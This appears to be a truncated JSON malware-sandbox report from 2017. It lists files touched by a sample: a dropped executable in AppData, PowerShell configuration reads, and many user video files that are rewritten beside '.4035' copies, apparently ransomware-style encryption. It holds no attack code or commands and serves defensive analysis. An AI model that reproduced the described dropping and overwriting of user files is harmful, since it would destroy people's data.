{ "analysis_details": { "creation_time": "2017-09-07 18:14 (UTC+2)", "execution_successful": true, "number_of_processes": 10, "termination_reason": "timeout", "type": "analysis_details", "version": 1, "vm_analysis_duration_time": "00:15:25" }, "artifacts": { "files": [ { "filename": "CONOUT$", "hashes": [], "norm_filename": "conout$", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", "hashes": [], "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp13684.exe", "hashes": [ { "md5_hash": "8f74824751359ce6359876e422c1f8c1", "sha1_hash": "86ec6897a9efbe17cefae3ebe8062a3153bccd6d", "sha256_hash": "a5aac8cb7ed1e315f16975522723605b3cf27c8676f000be3d65ad6a56daf014", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp13684.exe", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "hashes": [], "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\", "hashes": [], "norm_filename": "c:", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users", "hashes": [], "norm_filename": "c:\\users", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\WindowsPowerShell\\profile.ps1", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\windowspowershell\\profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\windowspowershell\\microsoft.powershell_profile.ps1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "STD_INPUT_HANDLE", "hashes": [], "norm_filename": "std_input_handle", "operations": [ "access", "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Temp13684.exe", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 }, { "md5_hash": "8f74824751359ce6359876e422c1f8c1", "sha1_hash": "86ec6897a9efbe17cefae3ebe8062a3153bccd6d", "sha256_hash": "a5aac8cb7ed1e315f16975522723605b3cf27c8676f000be3d65ad6a56daf014", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\temp13684.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp13684.exe", "hashes": [], "norm_filename": "c:\\users\\ybz8bt~1\\appdata\\local\\temp13684.exe", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\ntuser.ini.4035", "hashes": [ { "md5_hash": "a69d1ce732f370c4e3dbdc4b92a09694", "sha1_hash": "ebe2275af3897092841d1199e5ac4f742563166c", "sha256_hash": "7258116174418acc346e6423bef9ab0de57c0ab329d22b7b867e07cfd9ab1e12", "type": "file_hash", "version": 1 }, { "md5_hash": "9918d934d1d114724c06920b676a815d", "sha1_hash": "8659d3027ac844883ae03898b712215556684986", "sha256_hash": "89eceb1c978b7a681b80ed3b90118427096a598e4fe596d3fb575fbb58d31835", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\ntuser.ini", "hashes": [ { "md5_hash": "a69d1ce732f370c4e3dbdc4b92a09694", "sha1_hash": "ebe2275af3897092841d1199e5ac4f742563166c", "sha256_hash": "7258116174418acc346e6423bef9ab0de57c0ab329d22b7b867e07cfd9ab1e12", "type": "file_hash", "version": 1 }, { "md5_hash": "9918d934d1d114724c06920b676a815d", "sha1_hash": "8659d3027ac844883ae03898b712215556684986", "sha256_hash": "89eceb1c978b7a681b80ed3b90118427096a598e4fe596d3fb575fbb58d31835", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.ini", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\1og0qP3Fd-msLjBK.mp4.4035", "hashes": [ { "md5_hash": "fe304b21152c6183d960d4d4f2fadfa7", "sha1_hash": "004e8bdb368b50194d9c25fecfbe020d9d86be39", "sha256_hash": "ee5adcf4e79cc073d6c4e700a86b3649e04b391cd8ea1b37aed6f97168678968", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\1og0qp3fd-msljbk.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\1og0qP3Fd-msLjBK.mp4", "hashes": [ { "md5_hash": "fe304b21152c6183d960d4d4f2fadfa7", "sha1_hash": "004e8bdb368b50194d9c25fecfbe020d9d86be39", "sha256_hash": "ee5adcf4e79cc073d6c4e700a86b3649e04b391cd8ea1b37aed6f97168678968", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\1og0qp3fd-msljbk.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\desktop.ini.4035", "hashes": [ { "md5_hash": "ca471b303bbcbe0ad8f75bb9ea51caa7", "sha1_hash": "17b0a0387f65b70c9f112dc86c3c12be69f6b374", "sha256_hash": "f6d36c9c57adc572ba16be91e2eb372438b0f00f4087586339f7ab6e7732c078", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\desktop.ini", "hashes": [ { "md5_hash": "ca471b303bbcbe0ad8f75bb9ea51caa7", "sha1_hash": "17b0a0387f65b70c9f112dc86c3c12be69f6b374", "sha256_hash": "f6d36c9c57adc572ba16be91e2eb372438b0f00f4087586339f7ab6e7732c078", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\desktop.ini", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\KyzG9Qjv.mp4.4035", "hashes": [ { "md5_hash": "54d39d6df8bd6e4dad3ef0a200b1fc01", "sha1_hash": "7ffce778d8903b262ccda9b006b42a5b09e7be5c", "sha256_hash": "4a8f4b88fdcd37b28464fcd3aa152ae7212fd3193012555a77e029d355f69ebe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\kyzg9qjv.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\KyzG9Qjv.mp4", "hashes": [ { "md5_hash": "54d39d6df8bd6e4dad3ef0a200b1fc01", "sha1_hash": "7ffce778d8903b262ccda9b006b42a5b09e7be5c", "sha256_hash": "4a8f4b88fdcd37b28464fcd3aa152ae7212fd3193012555a77e029d355f69ebe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\kyzg9qjv.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\mRBfXb6WZFJqjhJ.avi.4035", "hashes": [ { "md5_hash": "1f9cd2933ccd0ad365d4f4f5f5612b66", "sha1_hash": "87adf3bc6ba1ab4bb5128a55173e7d1b3be5c6b8", "sha256_hash": "c46e934742e11e288141a5aaf6034d98ac70da5e945b6e911951707fe6fc5123", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\mrbfxb6wzfjqjhj.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\mRBfXb6WZFJqjhJ.avi", "hashes": [ { "md5_hash": "1f9cd2933ccd0ad365d4f4f5f5612b66", "sha1_hash": "87adf3bc6ba1ab4bb5128a55173e7d1b3be5c6b8", "sha256_hash": "c46e934742e11e288141a5aaf6034d98ac70da5e945b6e911951707fe6fc5123", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\mrbfxb6wzfjqjhj.avi", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\oaU1-cqbOI.flv.4035", "hashes": [ { "md5_hash": "fd493a66de029ffcc0d444f5fe718552", "sha1_hash": "50e18c7f0382d79f9ead32dccacdc17f75732b50", "sha256_hash": "a3ec86bd020563f08ee4b3e7d0d2b280417f10d85a285521b96a45034c60f9dd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\oau1-cqboi.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\oaU1-cqbOI.flv", "hashes": [ { "md5_hash": "fd493a66de029ffcc0d444f5fe718552", "sha1_hash": "50e18c7f0382d79f9ead32dccacdc17f75732b50", "sha256_hash": "a3ec86bd020563f08ee4b3e7d0d2b280417f10d85a285521b96a45034c60f9dd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\oau1-cqboi.flv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\RQT04-SfCzOy.swf.4035", "hashes": [ { "md5_hash": "c694568c984ebf5cce602a04c2efda21", "sha1_hash": "62cee0a5918316782b21e0a89e01acc1117de038", "sha256_hash": "9b59a1694754df96e99379fdc9e6dc73f70b85852f25f6de038dbb38fe686331", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\rqt04-sfczoy.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\RQT04-SfCzOy.swf", "hashes": [ { "md5_hash": "c694568c984ebf5cce602a04c2efda21", "sha1_hash": "62cee0a5918316782b21e0a89e01acc1117de038", "sha256_hash": "9b59a1694754df96e99379fdc9e6dc73f70b85852f25f6de038dbb38fe686331", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\rqt04-sfczoy.swf", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\ZplS8lO4RHe9I.flv.4035", "hashes": [ { "md5_hash": "dad6d1cb627c5dc66f8beff124601e0e", "sha1_hash": "c2a1862900dd2fefb0dcb6f2b265d7acca289e35", "sha256_hash": "dd4dc5a5d3c0ec1f604c33192bafd94fe9882fe379827bf8ae88e23ee044eb29", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\zpls8lo4rhe9i.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\ZplS8lO4RHe9I.flv", "hashes": [ { "md5_hash": "dad6d1cb627c5dc66f8beff124601e0e", "sha1_hash": "c2a1862900dd2fefb0dcb6f2b265d7acca289e35", "sha256_hash": "dd4dc5a5d3c0ec1f604c33192bafd94fe9882fe379827bf8ae88e23ee044eb29", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\zpls8lo4rhe9i.flv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\ZsxMbWqK2e.avi.4035", "hashes": [ { "md5_hash": "d0cec1d4c1992fe96781e4402b1d46e0", "sha1_hash": "95cc6459fcb6c1ad165f6887984c7adabe08f8f2", "sha256_hash": "5415b7a8aaa81629283109b62759ca0500df5f88ac150d75135de779ea3a56f3", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\zsxmbwqk2e.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\ZsxMbWqK2e.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\zsxmbwqk2e.avi", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\6NqrR.flv.4035", "hashes": [ { "md5_hash": "492d060d626d9dc07fbcb27982e6ef3a", "sha1_hash": "12118ef85937c348c4022afe182026fb126b0da1", "sha256_hash": "ace5ac98b22860209f1aa0c26fc48d0205533f625790c89186538761a374875e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\6nqrr.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\6NqrR.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\6nqrr.flv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\CaCxexCSoudw1ihbRVJj.flv.4035", "hashes": [ { "md5_hash": "5d6e37aebb92ce0df15c8a46eead4cd4", "sha1_hash": "ac586da11c9249e24dcd99c4f15464695dec4c8d", "sha256_hash": "6dcfd324d7d5a21ddac1250dd8178b4f3c7bb10e20b0ff31a2f702ed377fd68a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\cacxexcsoudw1ihbrvjj.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\CaCxexCSoudw1ihbRVJj.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\cacxexcsoudw1ihbrvjj.flv", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\cpe6B9Cb6wzufywLybXe.avi.4035", "hashes": [ { "md5_hash": "33ae70ed9c02375810fc6fc8e8b135e0", "sha1_hash": "ca28891089e1a5b7c34500b8e594e28d5740ae2e", "sha256_hash": "7d02c09f0f1790b1d2f9ded6c71782b7fc3fe774705ecca45d305a38e3811c82", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\cpe6b9cb6wzufywlybxe.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\cpe6B9Cb6wzufywLybXe.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\cpe6b9cb6wzufywlybxe.avi", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\Kn8m4xKHxS.mp4.4035", "hashes": [ { "md5_hash": "d16da673151ea6951850e3808dd7144f", "sha1_hash": "a21dd60d35f9009c4fc05931662b8b25022be7d9", "sha256_hash": "1a80b46ef495666e719a5006388e447a52017b15794176d1b398f8947499421e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\kn8m4xkhxs.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\Kn8m4xKHxS.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\kn8m4xkhxs.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\nAC 5Jyw.mp4.4035", "hashes": [ { "md5_hash": "013ceea4037ddfefe93741258ac33658", "sha1_hash": "f8a6d0724f2efe4e93604249294fc93628f33e4c", "sha256_hash": "cbe47e10eb172c1a5a03b9e1b4351c85e5ff736495ad42af53af83d3c8c0730d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\nac 5jyw.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\nAC 5Jyw.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\nac 5jyw.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\T4peD9H1NCe.avi.4035", "hashes": [ { "md5_hash": "a92352091958533a7039305745544a10", "sha1_hash": "32ff4ba11cbb90f56d35ac726674d121c8fa46ce", "sha256_hash": "fa5bac0cb713347c8011f6c80672d8a606b0f51643daf425fc498c8809124e4f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\t4ped9h1nce.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\T4peD9H1NCe.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\t4ped9h1nce.avi", "operations": [ "access", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\Z5EbMfgJ8h8.avi.4035", "hashes": [ { "md5_hash": "c0dbd7f6edf6c4e149d440d87521268f", "sha1_hash": "eda688df10bc5a6300efeb01c69d1879ecdc63fe", "sha256_hash": "19e3e71c9fbf6f95cbfe3b7f6a64f9c80414b3d211b87182d3a43b7ebacacd26", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\z5ebmfgj8h8.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\Z5EbMfgJ8h8.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\z5ebmfgj8h8.avi", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\f ZdvB2R.avi.4035", "hashes": [ { "md5_hash": "b267271a13f0b14a5502c08d06ce76ad", "sha1_hash": "14e003faacd2e2541db9b07841248893a65580aa", "sha256_hash": "fa8d6a555688a9942035789aba025c9adfa1b479e6398b61eb0f915644589fbf", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\f zdvb2r.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\f ZdvB2R.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\f zdvb2r.avi", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\FnM9eY1OQb.swf.4035", "hashes": [ { "md5_hash": "668d201f49f3175e7cff2f688233071d", "sha1_hash": "ec1e80620dc9519f67c94c40d2255c13272f201a", "sha256_hash": "10065789372b36ee5df684dcdd134b3187e2f3333b4d26743271382049b8fcba", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\fnm9ey1oqb.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\FnM9eY1OQb.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\fnm9ey1oqb.swf", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\FV9TKZgsub.mp4.4035", "hashes": [ { "md5_hash": "f6201cea6fef7e3108d663373a800a83", "sha1_hash": "b921f60ea7d5d5b2843019c22ceddbc925751cc6", "sha256_hash": "2272f5c2a80846c401a8d5d79aa2dff3f4fd6ed056c0b7cb7cd87a186efb5e04", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\fv9tkzgsub.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\FV9TKZgsub.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\fv9tkzgsub.mp4", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\oCKBGbVfktOD_QgfRkQn.swf.4035", "hashes": [ { "md5_hash": "6545ea5d0b7befda6d34fa57dce3dd9d", "sha1_hash": "98d4ec976a6175a79ecb49798401a9a481c10edc", "sha256_hash": "d03b4ccaee9b7f9b7e80d5f0e3aad03b28f9ac9ab5f9968a5d1b7ab3f44c85ce", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\ockbgbvfktod_qgfrkqn.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Videos\\a0EWjZO0H70q\\X8k-TB9nSgqIJ6\\oCKBGbVfktOD_QgfRkQn.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\ockbgbvfktod_qgfrkqn.swf", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 